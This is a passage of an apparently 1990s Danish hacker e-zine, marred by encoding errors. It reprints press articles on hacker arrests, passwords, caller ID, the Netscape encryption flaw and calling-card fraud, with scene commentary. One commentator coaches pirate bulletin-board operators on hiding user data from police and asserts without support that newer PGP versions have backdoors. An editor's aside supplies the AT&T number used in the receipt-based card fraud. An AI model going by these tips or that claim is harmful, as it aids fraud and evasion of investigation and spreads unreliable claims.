muligt at f† en kommentar fra rhus Politi, der st†r for anholdelserne. U’RLIGE HACKERE Sidste gang, politiet slog ned p† den danske hackerscene, udviklede sagen sig hurtigt til et mareridt for politiet. Hvad der skulle have v‘ret et hurtigt kirurgisk snit ned gennem den elektroniske kriminalitet, udviklede sig til en farce, hvor pressen var hurtigere orienteret om anholdelserne end politiet selv. I december 1993 indledte politiet den razzia, der kaldes Haslev-sagen. Mens politiet forg‘ves fors›gte at tr‘vle hackmilj›et op, tog hackerne deres kendskab til medierne til hj‘lpe for at f† nyheden ud hutigst muligt. Da den fjerde hacker, 'Wedlock', blev anholdt i T†rnby, var Ritzau s† hutigt orienteret, at Ritzau journalisten J›rgen Juul om anholdelsen - p† trods af, at det var J›rgen Juul, der havde bemyndiget den. Haslev-sagen er den hidtil st›rste hackersag i Norden, og ikke mindst derfor er politiet opsat p† at f† de anholdte d›mt efter anklageskriftet. Efterforsk- ningen best†ende af kriminalfolk fra Roskilde, to mand fra politiets rejsehold og tilkaldte, 'civile' edb-eksperter, arbejder p† 16'ende m†ned med at gennem- g† den datam‘ngde der blev konfiskeret i forbindelse med anholdelserne. Det drejer sig om mere end en million t‘tskrevne A4-ark. HACKER-POLITI Bel‘rt af erfaringerne nedsatte Politiets Efterretningstjeneste i efter†ret 1994 en specialgruppe, der skal tage sig af elektroniske kriminalitet. Specialgruppen skal f›rst og fremmest besk‘ftige sig med det offentliges elektroniske sikkerhed, men kan ogs† bist† kriminalpolitiet i efterforskning af f.eks. hackersager. Om specialgruppen har v‘ret impliceret i de nye hacker-anholdelser vides ikke, men 'det kunne ligne en pr›veklud' siger Ekstra Bladets kilde i hackermilj›et. Selv om der efterh†nden har v‘ret en r‘kke st›rre hackersager i Danmark, er det stadig meget nemt at hacke. Efter anholdelserne i december 1993 og januar 1994 var der kortvarigt stille om hackerne. I dag hackes der igen p† fuld styrke herhjemme. P† de forskellige edb-systemer bruges der stadig passwords, der er alt for nemme at g‘tte. I den aktuelle sag p† rhus Universitet var passwordet til superbruger- kontoen, der giver ubegr‘nset kontrol over hele universitetscomputeren '12345678'. Det svarer i datasikkerhed til at have en hovedd›r - komplet med Ruko-l†s og hele marmeladen - og s† en d›rkarm af v†dt toiletpapir. Selv om du bruger andre ord, er du stadig ikke garderet mod hackere. Hackerne har programmer , der kan k›re tusindvis af ord, for eksempel hentet fra WordPerfects ordbogsfunktion, igennem passwordcheck i l›bet af ganske kort tid. Derfor skal man ikke v‘lge passwords der best†r af almindelige ord, men sammens‘tte sit password af tilf‘ldige bogstaver og tal, for eksempel 'P8-tr‘ning' (potte-tr‘ning). Endelig skal man ikke bruge det samme password p† flere systeme. ------------ Meget kan siges, men hvis det er rigtigt at Pharzyde ikke vidste, at han havde en superbruger account, s† har han fortjent at blive taget.... - Clive Sharp R†d til danske sysopper og brugerne af deres systemer ------------------------------------------------------- Indskrevet af en anonym person - Darkseed Da politiet har fulgt Pharzyde og andres linier DATA, og har haft mulighed for at kunne se alt hvad han lavede p† de forskellige boards, og af rent sikkerheds m‘ssige grunde, vil jeg give dette r†d til alle sysopper, og brugere der har adresser/telefon numre liggende p† sin harddisk. Krypter ALLE filer der indeholder information, s†som adresser og navne p† brugere af de forskellige 'fy-fy' boards. Skriv telefon numrene og adresser fra userlisterne ned i en anden fil (krypter den), og slet s† de vitale informationer fra userlisterne. 1 person kan hurtig blive skyld i en stor m‘ngde busts (nogen der ›nsker det?), hvis han har s†danne informationer liggende. Boards Pharzyde har benyttes sig af de sidste par m†neder, vil jeg r†de til at holde en mindre pause, og totalt udelukke 'ukendte' new users. Der er ingen tvivl om at politiet vil efterforske NPD boards n‘rmere, som de har set Pharzyde (m.fl.?) logge ind p†. De userlister, en lille snot unge kaldet Junker Jake, udgav for nogen tid siden, er der ingen tvivl om at politiet har f†et fat i (de har Pharzydes harddisk - Pharzyde havde listerne)! V‘r ekstra forsigtig, der er ingen grund til at flere boards bliver lukket, og at flere bliver busted (vi b›r ihvertfald undg† det s† godt som overhovedet muligt). Brug Pretty Good Privacy [PGP] (af ‘ldre dato. Versioner nyere end 2.3 har backdoors, og kan ikke stoles p†). Der er al mulig grund til ikke at f›le sig for sikker! Dansk PiratLinie Oprettet --------------------------- - Darkseed Kilde: JP. Man 3. Apr 1995 P† bedste amerikanske vis f†r Danmark nu ogs† et telefonnummer, hvor ansatte i en virksomhed eller andre kan ringe op og angive en arbejdsgiver, en tidligere kammerat eller en bekendt for at bruge Pirat-kopieret software. Nummeret g†r under betegnelsen Piratlinien og er oprettet af Business Software Alliance. Piratlinien vil i Danmark best† af en telefon, der er stillet op hos advokat Niels M. Andersen hos advokatfirmaet Berning, Schlter og Hald. De er specialiseret i at jage softwarepirater ... --------- Jeg f†r snart store klodser af at h›re om Schlter og hans "anti-warez" venner. Har den mand nogensinde udrettet noget seri›st??? Har han nogensinde bustet nogen for at have "pirat-warez"??? Manden er et fjols... - Clive Sharp Sv‘re tider for hackerne Af Jan Carlsen, Institut for Datasikkerhed Kronikken i ComputerWorld nr. 29 - 1. September 1995 - Clive Sharp "Nu dages det br›dre, det lysner i ›st". S†dan lyder en gammel social- demokratisk slagsang, som imidlertid ogs† kan benyttes til andre ting. I denne forbindelse som et glad budskab til de sikkerhedsfolk, der skal beskytte virk- somhederne, blandt andet mod hackere. For der er hj‘lp p† vej. Hj‘lpen tager fat om en af v‘senligeste forud- s‘tninger for at v‘re hacker, nemlig anonymiteten. Uden at kunne v‘re d‘kket af en anonymitet er der ikke meget sjovt ved at hacke. T‘nk om en hacker en sen aftentime s‘tter sig ved klaviaturet for et par timers sjov, hvor vedkommende helt anonymt og naturligvis helt uskyldigt roder lidt rundt i en af jeres vitale databaser, og derefter lader jer betale regningen for videreopkald til jeres samarbejdspartner i USA, hvor han da lige kan ‘ndre et par ordre inden han forts‘tter sin uskyldige fremf‘rd andetsteds i verden. Alt i alt et sp‘ndende natteprogram, der nok skal kunne b›de lidt p† manglen p† kendskab til og omgang med det andet k›n [man tror virkeligt at det er l›gn -red]. Forstil dig s†, at en halv time efter at han har startet sine krimin- elle handlinger, s† banker det p† d›ren og to grandvoksne politifolk anholder ham og beslagl‘gger hans udstyr. L‘g s† hertil en straf (stor eller lille) som han id›mmes, samt et erstatningskrav fra den/de virksomheder, som han har v‘ret inde hos, s† kan man m†ske fornemme, at det sjove ved hacking er ved at forsvi- nde. Dette har hidtil ikke kunnet lade sig g›re, men med digitaliseringen af centralerne er de tekniske muligheder kommet til stede. Imidlertid har retsplejeloven sat en stopper for politiets efterforskning gennem aflytning af telekommunikationen, idet der her kr‘ves mistanke om en forbrydelse med en straframme p† minimum 6 †r, f›rend en dommer vil give tilladelse til en s†dan aflytning, og det er naturligvis normalt et godt stykker over den straf en hacker kan forvente at f†. S† hackeren har hidtil kunne tage det roligt, idet reglerne om privatlivets fred overfor tredje part ogs† har beskyttet disse kriminelle. Anderledes er det imidlertid i forholdet mellem den, der ringer op (B-nummeret) og den der ringes til (A-nummeret). Her er der i princippet ingen tredje part, og der er ikke lovet noget om hemmeligholdelse overfor den der ringes til. Hverken registerloven, retsplejeloven eller anden lovgivning/best- emmelser forhindrer dette. Det er netop p† dette punkt, at der nu g›res noget for at fjerne anon- ymiteten af den, der ringer. Det sker ved, at Tele-Danmark senere p† †ret kom- mer med en ny service, hvor B-nummeret kan afl‘ses af modtageren (A-nummeret). Det betyder, at modtageren enten kan undlade at besvare opkaldet - eksempelvis fordi modtageren ikke kender vedkommende eller netop kender vedkommende og ikke ›nsker at tale/kommunikere med denne - eller efterf›lgende kan se, hvorfra det p†kaldende opkald kom. Indledningsvis vil der blive tilbudt en relativ simpel enhed til at s‘tte p† telefonlinien, som afsl›rer nummeret, der kaldes fra. S†danne enheder kendes allerede idag, men de er baseret p†, at den, der kalder selv skal ind- taste sit telefonnummer - og det kan man af gode grunde ikke forvente af en hacker, hvorfor afsendernummeret i fremtiden afsendes automatisk fra centralen. Senere kommer der mere intelligente enheder, hvori blandt andet kan indkodes positiv- og negativlister over hvilke numre, man ›nsker/ikke ›nsker at kommuni- kere med. Endvidere arbejdes der p† at f† etableret en ordning, hvor abonenten - eventuelt via sin sk‘rm - kan g† ind og se en log over de opkald, der har v‘ret. Envidere etableres der en s‘rlig ordning for abonnenter med "hemmelige" numre, med det skal siges, at selv hackere med "hemmeligt" telefonnummer ikke skal regne med at komme langt i fremtiden. Selv om denne ordning ikke totalt vil afskaffe hacking, s† er der dog tale om et mile-skridt i den rigtige retning, og der er ingen tvivl om, at der vil blive tale om v‘sentlige samfundsbesparelser, for ikke at forglemme en v‘s- entlig bedre kommunikationssikkerhed i mange virksomheder, lettere mulighed for at stoppe telefon-terror med mere. Bedst af alt er imidlertid, at ordningen ogs† begr‘nser de unge menne- skers mulighed for at blive s† rutinerede hackere, at deres fremtidige l›bebane fastl†ses til at v‘re af kriminel art. ---------- Jeg kunne komme med kritik af denne artikel fra Jan Carlsen, men det ville fylde mere, end artiklen selv... Jeg har dog et sp›rgsm†l til Jan: I USA har de haft disse funktioner i mange †r, har det afskaffet hacking i USA? Hackere ringer verden rundt p† andres Visa Dankort Af Lisbeth Egeskov Forsiden p† ComputerWorld nr. 27 - 18. August 1995 - Clive Sharp Nummeret p† en betalingskortkvittering kan misbruges af enhver, der samler bon'en op fra gulvet i forretningen, til at ringe verden rundt eller k›be ind p† postordre. If›lge Computerworlds oplysninger er det ved at vinde indpas i danske hackerkredse at samle betalingskortkvitteringer op af papirkurven ved betaling- steder og ad den vej finansiere behovet for lange udlandssamtaler. N†r man betaler med eller h‘ver penge p† sit kreditkort eller kombiner- ede kreditkort/Dankort, st†r hele kortnummeret ofte p† bon'en eller kviterin- gen. Kortnummeret p† kvitteringen fra et betalingskort er nok til at ringe gen- nem det amerikanske telefonselskab AT&T's calling card servicenummer [som er 80010010, hvis nogen er i tvivl -red]. Nummeret, der betjenes af en computer, er en moderne udgave af Rigstelefonen. Fra det kan man ringe videre til hele verden ved hj‘lp af et nummer p† et kort fra de kendte, verdensd‘kkende kredit- kort. Voice response-systemet hos AT&T oplyser, at man kan indtaste nummeret p† sit AT&T calling card eller "any major credit card". Stemmen beder ogs† om kortets udl›bsdato, men acceptere gerne en fiktiv dato, viser en test af mulig- hederne. At bede om udl›bsdatoen, som normalt ikke st†r p† kvitteringen, er tilsyneladende ment som en sikkerhedsforanstaltning. Man kan misbruge b†de Eurocard og Visa Dankort. Ved en test lykkedes det med det samme at komme igennem ved hj‘lp af kortnumre fra flere Eurocard kvitteringer. Per Ladegaard, administrerende direkt›r for Pengeinstitutternes Betalinge Service, fort‘ller, at hans folk ogs† kom igennem p† Visa Dankort, da de efter ComputerWorlds henvendelse afpr›vede mulighederne. Hold ›je med opkr‘vning. Fordi pinkoden p† betalingskortet ikke indg†r i misbruget, kommer kortindehaveren ikke til at h‘nge p† en ›re af regningen. Det st†r klart i betalingskortloven. - Men det kr‘ver selvf›lgeligt, at man op- dager, at ens betalingskortnummer er blevet misbrugt af andre til for eksempel at ringe verden rundt, siger kontorchef i Forbrugerstyrelsen, Frank Bjerg Mor- tensen. - Man skal altid kontrollere opkr‘vningerne fra kortselskaberne. De er en del af sikkerhedssystemet, siger Per Ladegaard, PBS. Det er PBS, der i Dan- mark administrerer Eurocard og Visa Dankort. Selv om Forbrugerstyrelsen og PBS er enige om, at forbrugeren ikke h‘f- ter for misbrug, er de ikke enige om, hvem der s† h‘nger p† regningen. - Det er kortudstederen, der h‘fter. Det er denne ansvar, at kortnumre ikke kan mis- bruges. For kortnumre er ikke hemmelige, og det m† ikke komme brugeren til skade at smide en kvittering i papirkurven, siger Frank Bjerg Mortensen. - Problemet ligger ikke hos os, men hos AT&T. Det er dem, der er service- udbyder. Deres kontrolsystem er tilsyneladende ikke godt nok, n†r det ikke af- viser en falsk udl›bsdato, siger Per Ladegaard. Han siger, at PBS vil tage sagen op med AT&T via de internationale kanaler, men at det godt kan tage nogen tid, f›r problemet bliver l›st. Det er ikke lykkedes at f† en kommenter fra AT&T. Problemet med misbrug af kreditkort er dog ikke s† stort, som det bliver gjort til, mener administrerende direkt›r Per Ladegaard, PBS. - Vores opg›relser viser, at tendensen til tab p† grund af misbrug b†de af Dankort og kreditkort er faldende, siger Per Ladegaard, som understreger, at PBS ikke sl‘kker p† sikkerheden af den grund. -------------- AT&T havde samme service i slutningen af 1980'erne, og det voldte den s† store problemer, at de m†tte lukke den service (til en vis grad), og s† gen†bner man den service igen, UDEN at forbedre sin sikkerhed! Hvor smart er man s†??? Se hackerens telefonnummer Af Pia Lykke Andersen ComputerWorld nr. 30 - 8. September 1995 - Clive Sharp I l›bet af et halvt †r vil TeleDanmark tilbyde de f›rste kunder mulig- heden for at se p† telefonen, hvilket nummer der ringes fra. Mange edb-afdelinger har pr›vet det: En hacker er i nattens l›b tr‘ngt ind i systemerne og har hentet informationer i virksomheden eller brugt tele- fonsystemet til at ringe videre ud i verden. Til stor irritation for de fleste der har haft ubudte g‘ster via telefonnettet, er det ikke muligt at f† oplyst, hvem der har ringet til virksomheden. L›sningen hedder A-nummeroverf›rsel, og det kan i princippet godt lade sig g›re. Flere at vore nabolande har inf›rt det, men det er ikke tilladt i Danmark. Men der er h†b forude for edb-afdeli- nger og andre der bliver udsat for ubehagelige opringninger. I n‘r fremtid bliver de en bekymring mindre. En arbejdsgruppe i TeleDanmark unders›ger i ›je- blikket, hvordan, og i hvilken takt, A-nummeroverf›rsel kan indf›res herhjemme. Centraler ‘ndres. I l›bet af det n‘ste halve †r, begynder TeleDanmark at tilbyde A- nummeroverf›rsel i en r‘kke testomr†der i Danmark. Den nye service bliver sand- synligt lansd‘kkende i l›bet af et par †r. At A-nummeroverf›rsel ikke er til- ladt i Danmark skyldes hensynet til de abonnenter, som ›nsker hemmeligt nummer. Men ved fremtidens A-nummeroverf›rsel vil de hemmelige telefonnumre kunne for- blive hemmelige. Enten ved at software p† den digitale telefoncentral registr- erer, at det hemmeligt nummer ikke skal f›res videre til modtageren af sam- talen, eller ved, at den, der ringer op programmere sin telefon til ikke at op- lyse, hvem man er. Tilsvarende kan modtageren af samtaler programmere sin tele- fon til at afvise anonyme opkald. De digitale telefoncentraler er ikke program- merede til A-nummeroverf›rsel, men deres software kan konfigureres til den nye service. Sandsynligvis bliver omkring 300.000 abonnenter, som h›rer til p† en digital AXE-telefoncentral i S›nderjylland og p† Fyn, de f›rste, der kan tage A-nummeroverf›rsel i brug. Endnu har ETSI (det europ‘iske telestandardiserings- organ) ikke udsendt en international standard for overf›rsel af A-numre i tele- fonnettet, og den er heller ikke lige p† trapperne. Derfor v‘lger operat›rerne selv, hvilken metode de finder bedst til den nye service. Den nye service betyder ogs†, at der vil komme nye telefoner p† markedet. N†r A-nummerover- f›rsel bliver aktuel i Danmark, vil TeleDanmark samtidigt markedsf›re et disp- lay, som kan kobles til telefonen. Det kan vise, hvor der ringes fra. Prisen bliver sandsynligvis er par hundrede kroner. ISDN til ISDN. Enhver regel bekr‘ftes som bekendt af undtagelsen. Ogs† den om det forbudte A-nummer. Danske abonnenter med ISDN-forbindelser kan nemmeligt aller- ede se hinandens telefonnumre p† telefonens display, hvis begge parter ›nsker det. Sikkerhedshul i Netscape Af Pia Lykke Andersen ComputerWorld nr. 30 - 8. September 1995 To studerende har g‘ttet sig frem til krypteringskoden p† Netscape, det mest benyttede software til WWW p† Internet. Sent s›ndag aften sendte to californiske studerende, Ian goldberg og David Wagner, en besked ud p† Internet, som har vakt en del opsigt: P† blot to dage var det lykkedes dem at finde et svagt hul i Netscape og skrive software, som p† mindre end et minut g›r det muligt at bryde krypteringskoden til Net- scape. Sikkerheden p† Netscape skabes ved brug af s†kaldt symmetrisk n›gle- kryptografi. N›glen best†r af en matematisk formel s† lang, at den er umulig for hackere at bryde. Men det tilf‘ldige tal, som skaber den krypterede n›gle, var nemt for de to studerende at g‘tte sig frem til. - Netscapes software er ikke s† godt, som folk troede, hvilket sandsynligvis er v‘rre, end ingen sikkerhed, da folk f†r falsk tryghed, n†r de sender betalingsdetaljer over Int- ernet, sagde Jan Goldberg tidligere p† ugen til Wall Street Journal. If›lge samme avis lykkedes samme man›vre allerede for en m†ned siden for en fransk studerende. Netscape Navigator er det mest brugte redskab til at finde rundt p† den grafiske del af Internet, World Wide Web, hvor man blandt andet kan g† p† indk›b i virtuelle forretninger, og hvor man m† opgive sit kreditkortnummer for at f† varen leveret. hidtil er det blevet betragtet som ganske sikkert, at opgive kreditkortnumre og sende andre f›lsomme oplysninger over Internet [!!!]. Hullet kan lappes. Netscape benyttes i dag af flere end otte milioner mennesker. At den nyopdagede svaghed i Netscape Navigator faktisk er en realitet, bekr‘ftes af Netscape-selskabet. I en meddelelse p† Internet forklarer firmaet selv pro- blemet. - Netscape vil hurtigst muligt sende opdateret software p† Internet, hvorfra brugerne kan downloade det. En opdateret version af Netscape Navigator 1.1 til Mac OS, Unix og af Netscape Navigator 1.2 til Windows 3.1 og Windows 95 vil kunne downloades af eksisterende brugere af Internet i n‘ste uge. Desuden vil version 2.0 af Netscape Navigator, som kommer i beta-versioner i n‘ste uge, ogs† indeholde dette supplement s†vel som et antal yderligere sikkerheds- foranstaltninger, lyder det i budskabet fra Netscape. Virksomheden Netscape, som blev stiftet sidste †r, hentede i april m†ned 17 millioner dollars til huse ved at s‘lge 11 procent af aktierne i sel- skabet. Bland andet k›bte ComputerWorlds moderselskab, IDG, en andel p† to pro- cent. I august m†ned gik Netscape p† Nasdaq-b›rsen med salg af 3,5 millioner aktier til priser mellem 12 og 14 dollars, og firmaet betegnes som et af de mest interessante foretagender i Internet-software industrien. ENDEX